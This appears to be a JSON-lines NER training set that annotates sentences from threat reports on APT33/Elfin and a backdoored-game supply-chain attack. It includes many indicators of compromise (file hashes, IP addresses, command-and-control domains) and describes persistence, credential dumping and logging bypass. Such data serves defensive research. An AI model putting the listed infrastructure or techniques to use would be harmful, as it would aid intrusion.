{"text": "At this point , additional activity from the attackers continued between March 5 into April , and on April 18 at 11:50 , a second remote access tool known as DarkComet was deployed to csidl_profile\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\smss.exe on the infected computer .", "spans": {"Malware: DarkComet": [[158, 167]], "Indicator: menu\\programs\\startup\\smss.exe": [[238, 268]]}, "info": {"id": "aptner_train_000596", "source": "aptner_train"}}
{"text": "This was quickly followed 15 seconds later by the installation of a credential dumping to csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe , and the execution of powershell commands via PowerShell Empire , a freely available post-exploitation framework , to bypass logging on the infected machine .", "spans": {"Indicator: csidl_profile\\appdata\\roaming\\microsoft\\credentials\\dwm32.exe": [[90, 151]], "System: powershell": [[175, 185]], "System: PowerShell Empire": [[199, 216]]}, "info": {"id": "aptner_train_000597", "source": "aptner_train"}}
{"text": "Activity continued throughout April where additional versions of DarkComet , POSHC2 implants , and an AutoIt backdoor were deployed along with further credential dumping activities .", "spans": {"Malware: DarkComet": [[65, 74]], "Malware: POSHC2": [[77, 83]], "Malware: AutoIt backdoor": [[102, 117]]}, "info": {"id": "aptner_train_000598", "source": "aptner_train"}}
{"text": "Elfin is one of the most active groups currently operating in the Middle East , targeting a large number of organizations across a diverse range of sectors .", "spans": {"Organization: Elfin": [[0, 5]]}, "info": {"id": "aptner_train_000599", "source": "aptner_train"}}
{"text": "Over the past three years , the group has utilized a wide array of tools against its victims , ranging from custom built malware to off-the-shelf RATs , indicating a willingness to continually revise its tactics and find whatever tools it takes to compromise its next set of victims .", "spans": {}, "info": {"id": "aptner_train_000600", "source": "aptner_train"}}
{"text": "Symantec has the following protection in place to protect customers against these attacks , APT33 : Backdoor.Notestuk Trojan.Stonedrill Backdoor.Remvio Backdoor.Breut Trojan.Quasar Backdoor.Patpoopy Trojan.Nancrat Trojan.Netweird.B Exp.CVE-2018-20250 SecurityRisk.LaZagne Hacktool.Mimikatz SniffPass .", "spans": {"Organization: APT33": [[92, 97]], "Malware: Backdoor.Notestuk": [[100, 117]], "Malware: Trojan.Stonedrill": [[118, 135]], "Malware: Backdoor.Remvio": [[136, 151]], "Malware: Backdoor.Breut": [[152, 166]], "Malware: Trojan.Quasar": [[167, 180]], "Malware: Backdoor.Patpoopy": [[181, 198]], "Malware: Trojan.Nancrat": [[199, 213]], "Malware: Trojan.Netweird.B": [[214, 231]], "Vulnerability: Exp.CVE-2018-20250": [[232, 250]], "Malware: SecurityRisk.LaZagne": [[251, 271]], "Malware: Hacktool.Mimikatz": [[272, 289]], "Malware: SniffPass": [[290, 299]]}, "info": {"id": "aptner_train_000601", "source": "aptner_train"}}
{"text": "APT33 : 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5798aefb07e12a942672a60c2be101dc26b01485616713e8be1f68b321747f2f": [[8, 72]]}, "info": {"id": "aptner_train_000602", "source": "aptner_train"}}
{"text": "APT33 : a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 backdoor .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449": [[8, 72]]}, "info": {"id": "aptner_train_000603", "source": "aptner_train"}}
{"text": "APT33 : f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5": [[8, 72]]}, "info": {"id": "aptner_train_000604", "source": "aptner_train"}}
{"text": "APT33 : 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 87e2cf4aa266212aa8cf1b1c98ae905c7bac40a6fc21b8e821ffe88cf9234586": [[8, 72]]}, "info": {"id": "aptner_train_000605", "source": "aptner_train"}}
{"text": "APT33 : 709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 709df1bbd0a5b15e8f205b2854204e8caf63f78203e3b595e0e66c918ec23951": [[8, 72]]}, "info": {"id": "aptner_train_000606", "source": "aptner_train"}}
{"text": "APT33 : a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 RAT .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0": [[8, 72]]}, "info": {"id": "aptner_train_000607", "source": "aptner_train"}}
{"text": "APT33 : 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d RAT .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 0b3610524ff6f67c59281dbf4a24a6e8753b965c15742c8a98c11ad9171e783d": [[8, 72]]}, "info": {"id": "aptner_train_000608", "source": "aptner_train"}}
{"text": "APT33 : d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0 RAT .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: d5262f1bc42d7d5d0ebedadd8ab90a88d562c7a90ff9b0aed1b3992ec073e2b0": [[8, 72]]}, "info": {"id": "aptner_train_000609", "source": "aptner_train"}}
{"text": "APT33 : ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: ae1d75a5f87421953372e79c081e4b0a929f65841ed5ea0d380b6289e4a6b565": [[8, 72]]}, "info": {"id": "aptner_train_000610", "source": "aptner_train"}}
{"text": "APT33 : e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: e999fdd6a0f5f8d1ca08cf2aef47f5ddc0ee75879c6f2c1ee23bc31fb0f26c70": [[8, 72]]}, "info": {"id": "aptner_train_000611", "source": "aptner_train"}}
{"text": "APT33 : 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 018360b869d8080cf5bcca1a09eb8251558378eb6479d8d89b8c80a8e2fa328c": [[8, 72]]}, "info": {"id": "aptner_train_000612", "source": "aptner_train"}}
{"text": "APT33 : 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 367e78852134ef488ecf6862e71f70a3b10653e642bda3df00dd012c4e130330": [[8, 72]]}, "info": {"id": "aptner_train_000613", "source": "aptner_train"}}
{"text": "APT33 : ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: ea5295868a6aef6aac9e117ef128e9de107817cc69e75f0b20648940724880f3": [[8, 72]]}, "info": {"id": "aptner_train_000614", "source": "aptner_train"}}
{"text": "APT33 : 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18": [[8, 72]]}, "info": {"id": "aptner_train_000615", "source": "aptner_train"}}
{"text": "APT33 : bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: bf9c589de55f7496ff14187b1b5e068bd104396c23418a18954db61450d21bab": [[8, 72]]}, "info": {"id": "aptner_train_000616", "source": "aptner_train"}}
{"text": "APT33 : af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3 .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: af41e9e058e0a5656f457ad4425a299481916b6cf5e443091c7a6b15ea5b3db3": [[8, 72]]}, "info": {"id": "aptner_train_000617", "source": "aptner_train"}}
{"text": "APT33 : c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b FTP tool .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b": [[8, 72]]}, "info": {"id": "aptner_train_000618", "source": "aptner_train"}}
{"text": "APT33 : 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8 FTP tool .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 99c1228d15e9a7693d67c4cb173eaec61bdb3e3efdd41ee38b941e733c7104f8": [[8, 72]]}, "info": {"id": "aptner_train_000619", "source": "aptner_train"}}
{"text": "APT33 : 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997 downloader ( registry.ps1 ) .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 94526e2d1aca581121bd79a699a3bf5e4d91a4f285c8ef5ab2ab6e9e44783997": [[8, 72]], "Malware: registry.ps1": [[86, 98]]}, "info": {"id": "aptner_train_000620", "source": "aptner_train"}}
{"text": "APT33 : dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40 backdoor .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: dedfbc8acf1c7b49fb30af35eda5e23d3f7a202585a5efe82ea7c2a785a95f40": [[8, 72]]}, "info": {"id": "aptner_train_000621", "source": "aptner_train"}}
{"text": "APT33 : 95.211.191.117 update-sec.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 95.211.191.117": [[8, 22]], "Indicator: update-sec.com": [[23, 37]]}, "info": {"id": "aptner_train_000622", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.120 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000623", "source": "aptner_train"}}
{"text": "APT33 : 162.250.145.234 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.234": [[8, 23]], "Indicator: mynetwork.ddns.net": [[24, 42]]}, "info": {"id": "aptner_train_000624", "source": "aptner_train"}}
{"text": "APT33 : 91.235.142.76 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.235.142.76": [[8, 21]], "Indicator: mywinnetwork.ddns.net": [[22, 43]]}, "info": {"id": "aptner_train_000625", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.119 hyperservice.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.119": [[8, 19]], "Indicator: hyperservice.ddns.net": [[20, 41]]}, "info": {"id": "aptner_train_000626", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000627", "source": "aptner_train"}}
{"text": "APT33 : 213.252.244.14 service-avant.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 213.252.244.14": [[8, 22]], "Indicator: service-avant.com": [[23, 40]]}, "info": {"id": "aptner_train_000628", "source": "aptner_train"}}
{"text": "APT33 : 91.235.142.124 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.235.142.124": [[8, 22]], "Indicator: mywinnetwork.ddns.net": [[23, 44]]}, "info": {"id": "aptner_train_000629", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.120 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000630", "source": "aptner_train"}}
{"text": "APT33 : 162.250.145.234 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.234": [[8, 23]], "Indicator: mynetwork.ddns.net": [[24, 42]]}, "info": {"id": "aptner_train_000631", "source": "aptner_train"}}
{"text": "APT33 : 91.235.142.76 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.235.142.76": [[8, 21]], "Indicator: mywinnetwork.ddns.net": [[22, 43]]}, "info": {"id": "aptner_train_000632", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000633", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000634", "source": "aptner_train"}}
{"text": "APT33 : 95.211.191.117 update-sec.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 95.211.191.117": [[8, 22]], "Indicator: update-sec.com": [[23, 37]]}, "info": {"id": "aptner_train_000635", "source": "aptner_train"}}
{"text": "APT33 : 5.187.21.70 microsoftupdated.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.187.21.70": [[8, 19]], "Indicator: microsoftupdated.com": [[20, 40]]}, "info": {"id": "aptner_train_000636", "source": "aptner_train"}}
{"text": "APT33 : 217.13.103.46 securityupdated.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 217.13.103.46": [[8, 21]], "Indicator: securityupdated.com": [[22, 41]]}, "info": {"id": "aptner_train_000637", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.120 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.120": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000638", "source": "aptner_train"}}
{"text": "APT33 : 5.187.21.71 backupnet.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.187.21.71": [[8, 19]], "Indicator: backupnet.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000639", "source": "aptner_train"}}
{"text": "APT33 : 91.230.121.143 backupnet.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.230.121.143": [[8, 22]], "Indicator: backupnet.ddns.net": [[23, 41]]}, "info": {"id": "aptner_train_000640", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.119 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.119": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000641", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.117 srvhost.servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.117": [[8, 19]], "Indicator: srvhost.servehttp.com": [[20, 41]]}, "info": {"id": "aptner_train_000642", "source": "aptner_train"}}
{"text": "APT33 : 37.48.105.178 servhost.hopto.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 37.48.105.178": [[8, 21]], "Indicator: servhost.hopto.org": [[22, 40]]}, "info": {"id": "aptner_train_000643", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.117 srvhost.servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.117": [[8, 19]], "Indicator: srvhost.servehttp.com": [[20, 41]]}, "info": {"id": "aptner_train_000644", "source": "aptner_train"}}
{"text": "APT33 : 5.187.21.70 microsoftupdated.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.187.21.70": [[8, 19]], "Indicator: microsoftupdated.com": [[20, 40]]}, "info": {"id": "aptner_train_000645", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.214 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000646", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.217 [REDACTED].servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].servehttp.com": [[22, 46]]}, "info": {"id": "aptner_train_000647", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.214 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000648", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.214 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000649", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.214 [REDACTED].sytes.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: [REDACTED].sytes.net": [[22, 42]]}, "info": {"id": "aptner_train_000650", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000651", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.216 srvhost.servehttp.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: srvhost.servehttp.com": [[22, 43]]}, "info": {"id": "aptner_train_000652", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000653", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000654", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.215 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.215": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000655", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.217 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.217": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000656", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.216 [REDACTED].myftp.org .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: [REDACTED].myftp.org": [[22, 42]]}, "info": {"id": "aptner_train_000657", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.232 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.232": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000658", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.214 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.214": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000659", "source": "aptner_train"}}
{"text": "APT33 : 162.250.145.204 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.204": [[8, 23]], "Indicator: mynetwork.ddns.net": [[24, 42]]}, "info": {"id": "aptner_train_000660", "source": "aptner_train"}}
{"text": "APT33 : 188.165.4.81 svcexplores.com .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 188.165.4.81": [[8, 20]], "Indicator: svcexplores.com": [[21, 36]]}, "info": {"id": "aptner_train_000661", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.231 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.231": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000662", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.231 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.231": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000663", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.232 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.232": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000664", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.216 [REDACTED].myftp.biz .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: [REDACTED].myftp.biz": [[22, 42]]}, "info": {"id": "aptner_train_000665", "source": "aptner_train"}}
{"text": "APT33 : 91.230.121.143 remote-server.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.230.121.143": [[8, 22]], "Indicator: remote-server.ddns.net": [[23, 45]]}, "info": {"id": "aptner_train_000666", "source": "aptner_train"}}
{"text": "APT33 : 162.250.145.222 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 162.250.145.222": [[8, 23]], "Indicator: [REDACTED].ddns.net": [[24, 43]]}, "info": {"id": "aptner_train_000667", "source": "aptner_train"}}
{"text": "APT33 : 64.251.19.216 [REDACTED].redirectme.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 64.251.19.216": [[8, 21]], "Indicator: [REDACTED].redirectme.net": [[22, 47]]}, "info": {"id": "aptner_train_000668", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.222 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.222": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000669", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.223 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.223": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000670", "source": "aptner_train"}}
{"text": "APT33 : 217.147.168.44 remserver.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 217.147.168.44": [[8, 22]], "Indicator: remserver.ddns.net": [[23, 41]]}, "info": {"id": "aptner_train_000671", "source": "aptner_train"}}
{"text": "APT33 : 195.20.52.172 mynetwork.cf .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 195.20.52.172": [[8, 21]], "Indicator: mynetwork.cf": [[22, 34]]}, "info": {"id": "aptner_train_000672", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.221 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.221": [[8, 19]], "Indicator: mynetwork.ddns.net": [[20, 38]]}, "info": {"id": "aptner_train_000673", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.220 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.220": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000674", "source": "aptner_train"}}
{"text": "APT33 : 8.26.21.221 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 8.26.21.221": [[8, 19]], "Indicator: [REDACTED].ddns.net": [[20, 39]]}, "info": {"id": "aptner_train_000675", "source": "aptner_train"}}
{"text": "APT33 : 91.230.121.144 remserver.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 91.230.121.144": [[8, 22]], "Indicator: remserver.ddns.net": [[23, 41]]}, "info": {"id": "aptner_train_000676", "source": "aptner_train"}}
{"text": "APT33 : 89.34.237.118 mywinnetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 89.34.237.118": [[8, 21]], "Indicator: mywinnetwork.ddns.net": [[22, 43]]}, "info": {"id": "aptner_train_000677", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.35 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000678", "source": "aptner_train"}}
{"text": "APT33 : 5.79.127.177 mypsh.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 5.79.127.177": [[8, 20]], "Indicator: mypsh.ddns.net": [[21, 35]]}, "info": {"id": "aptner_train_000679", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.35 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000680", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.35 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000681", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.35 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.35": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000682", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.36 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.36": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000683", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.37 mynetwork.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.37": [[8, 21]], "Indicator: mynetwork.ddns.net": [[22, 40]]}, "info": {"id": "aptner_train_000684", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.38 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.38": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000685", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.39 remote-server.ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.39": [[8, 21]], "Indicator: remote-server.ddns.net": [[22, 44]]}, "info": {"id": "aptner_train_000686", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.40 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.40": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000687", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.41 mynetwork.cf .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.41": [[8, 21]], "Indicator: mynetwork.cf": [[22, 34]]}, "info": {"id": "aptner_train_000688", "source": "aptner_train"}}
{"text": "APT33 : 192.119.15.42 [REDACTED].ddns.net .", "spans": {"Organization: APT33": [[0, 5]], "Indicator: 192.119.15.42": [[8, 21]], "Indicator: [REDACTED].ddns.net": [[22, 41]]}, "info": {"id": "aptner_train_000689", "source": "aptner_train"}}
{"text": "gaming industry scope attackers asia .", "spans": {}, "info": {"id": "aptner_train_000690", "source": "aptner_train"}}
{"text": "This is not the first time the gaming industry has been targeted by attackers who compromise game developers , insert backdoors into a game’s build environment , and then have their malware distributed as legitimate software .", "spans": {}, "info": {"id": "aptner_train_000691", "source": "aptner_train"}}
{"text": "This time , two games and one gaming platform application were compromised to include a backdoor .", "spans": {}, "info": {"id": "aptner_train_000695", "source": "aptner_train"}}
{"text": "Although the malware uses different configurations in each case , the three affected software products included the same backdoor code and were launched using the same mechanism .", "spans": {}, "info": {"id": "aptner_train_000697", "source": "aptner_train"}}
{"text": "While two of the compromised products no longer include the backdoor , one of the affected developers is still distributing the trojanized version : ironically , the game is named Infestation , and is produced by Thai developer Electronics Extreme .", "spans": {"Organization: Electronics Extreme": [[228, 247]]}, "info": {"id": "aptner_train_000698", "source": "aptner_train"}}
{"text": "We have tried informing them several times , through various channels , since early February , but without apparent success .", "spans": {}, "info": {"id": "aptner_train_000699", "source": "aptner_train"}}
{"text": "Let’s look at how the malicious payload is embedded and then look into the details of the backdoor itself .", "spans": {}, "info": {"id": "aptner_train_000700", "source": "aptner_train"}}
{"text": "The payload code is started very early during the execution of the backdoored executable file .", "spans": {}, "info": {"id": "aptner_train_000701", "source": "aptner_train"}}
{"text": "Right after the PE entry point , the standard call to the C Runtime initialization ( __scrt_common_main_seh ) is hooked to launch the malicious payload before everything else .", "spans": {"System: __scrt_common_main_seh": [[85, 107]]}, "info": {"id": "aptner_train_000702", "source": "aptner_train"}}
{"text": "This may suggest that the malefactor changed a build configuration rather than the source code itself .", "spans": {}, "info": {"id": "aptner_train_000703", "source": "aptner_train"}}
{"text": "The code added to the executable decrypts and launches the backdoor in-memory before resuming normal execution of the C Runtime initialization code and all the subsequent code of the host application .", "spans": {}, "info": {"id": "aptner_train_000704", "source": "aptner_train"}}
{"text": "The embedded payload data has a specific structure , that is parsed by the added unpacking code .", "spans": {}, "info": {"id": "aptner_train_000705", "source": "aptner_train"}}
